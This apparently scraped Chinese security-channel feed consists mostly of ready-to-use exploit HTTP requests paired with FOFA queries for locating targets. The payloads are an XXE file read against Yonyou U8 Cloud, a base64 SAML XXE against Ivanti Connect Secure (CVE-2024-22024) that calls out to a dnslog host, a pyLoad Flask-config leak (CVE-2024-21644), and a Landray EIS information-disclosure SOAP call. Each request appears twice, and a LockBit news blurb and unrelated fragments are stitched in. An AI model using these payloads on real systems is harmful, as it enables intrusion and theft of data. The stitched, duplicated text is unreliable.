用友U8 Cloud smartweb2.RPC.d xxe漏洞
app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1Host: 192.168.40.131:8088User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25Content-Length: 260Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewMoxml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="="__profileKeys">%26Password;</p ></vps></rpc>
(执行查看C:/windows/win.ini命令)
app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1Host: 192.168.40.131:8088User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25Content-Length: 260Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewMoxml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="="__profileKeys">%26Password;</p ></vps></rpc>
(执行查看C:/windows/win.ini命令)
Forwarded from 蓝点网订阅频道
#科技资讯 #安全资讯 LockBit 勒索软件头目发布公开信,称自己过去几年沉迷于美女和游艇,导致未能升级 PHP 进而被 FBI 入侵。
查看全文:https://ourl.co/102565
LockBitSupp 称过去五年沉迷在金钱的海洋里,导致自己倦怠了,继续沉迷于游艇和美女,所以还在使用带有漏洞的 PHP 版本。
另外还透露 FBI 没抓人就动手是因为牵涉到了特朗普的一些法庭文件。
查看全文:https://ourl.co/102565
LockBitSupp 称过去五年沉迷在金钱的海洋里,导致自己倦怠了,继续沉迷于游艇和美女,所以还在使用带有漏洞的 PHP 版本。
另外还透露 FBI 没抓人就动手是因为牵涉到了特朗普的一些法庭文件。
😁9
Ivanti Pulse Connect Secure VPN 存在XXE 漏洞(CVE-2024-22024)
body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 172Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vMHVyeDNsLmRuc2xvZy5jbi94Ij4gJXdhdGNoVG93cjtdPjxyPjwvcj4
body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 172Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vMHVyeDNsLmRuc2xvZy5jbi94Ij4gJXdhdGNoVG93cjtdPjxyPjwvcj4
Pyload未授权访问漏洞(CVE-2024-21644)
app:"pyLoad"
GET /render/info.html HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/15.6Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip, deflate
(获取Flask配置poc)
app:"pyLoad"
GET /render/info.html HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/15.6Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip, deflate
(获取Flask配置poc)
👍3
蓝凌 EIS智慧协同平台WS_getAllInfos存在信息泄露漏洞
Fofa: app="Landray-EIS智慧协同平台
POST /WS/Basic/Basic.asmx HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: ASP.NET_SessionId=u1n0cky5q5giplqhpajjrf55; FIOA_IMG_FOLDER=FIUpgrade-Insecure-Requests: 1SOAPAction: http://tempuri.org/WS_getAllInfosContent-Type: text/xml;charset=UTF-8Host: Content-Length: 214<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"><soapenv:Header/><soapenv:Body><tem:WS_getAllInfos/></soapenv:Body></soapenv:Envelope>
Fofa: app="Landray-EIS智慧协同平台
POST /WS/Basic/Basic.asmx HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: ASP.NET_SessionId=u1n0cky5q5giplqhpajjrf55; FIOA_IMG_FOLDER=FIUpgrade-Insecure-Requests: 1SOAPAction: http://tempuri.org/WS_getAllInfosContent-Type: text/xml;charset=UTF-8Host: Content-Length: 214<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"><soapenv:Header/><soapenv:Body><tem:WS_getAllInfos/></soapenv:Body></soapenv:Envelope>
Search - Microsoft Bing
A gateway to stone wonders
From 18th-century visitors to fire-carved trails,
❤1